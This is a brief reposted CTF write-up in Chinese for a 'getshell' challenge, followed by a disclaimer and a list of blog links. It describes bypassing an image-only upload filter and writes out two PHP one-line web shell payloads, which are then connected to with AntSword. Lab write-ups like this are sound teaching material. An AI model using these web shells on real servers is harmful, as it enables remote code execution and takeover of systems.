云演 Can you getshell?
发布时间:2023年12月18日
1、扫目录,看看到upload.php,找到上传点
2、只让上传jpg gif png,上传图片写码
<?php @eval($_POST['c']);?>
这个码不行
换马
<script language="php">eval($_REQUEST[c])</script>
3、蚁剑连接、得到flag
文章来源:https://blog.csdn.net/qq_36286161/article/details/135043450
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
最新文章
- Python教程
- 深入理解 MySQL 中的 HAVING 关键字和聚合函数
- Qt之QChar编码(1)
- MyBatis入门基础篇
- 用Python脚本实现FFmpeg批量转换
- Neo4j 5建库
- AI智能写作平台有哪些,分享这几款好用的
- CleanMyMac X这一款mac电脑清理垃圾文件软件好用吗?
- 分页操作中使用LIMIT和OFFSET后出现慢查询的原因分析
- 论文精读:Vary: Scaling up the Vision Vocabulary for Large Vision-Language Models
- 压测clickhouse性能相关参数
- 什么是堡垒机
- 【Fi6S是什么?有什么功能和优势?带给我们的好处有什么?】
- doris基本操作,01-创建表,插入数据
- 《PySpark大数据分析实战》-22.Pandas介绍Series介绍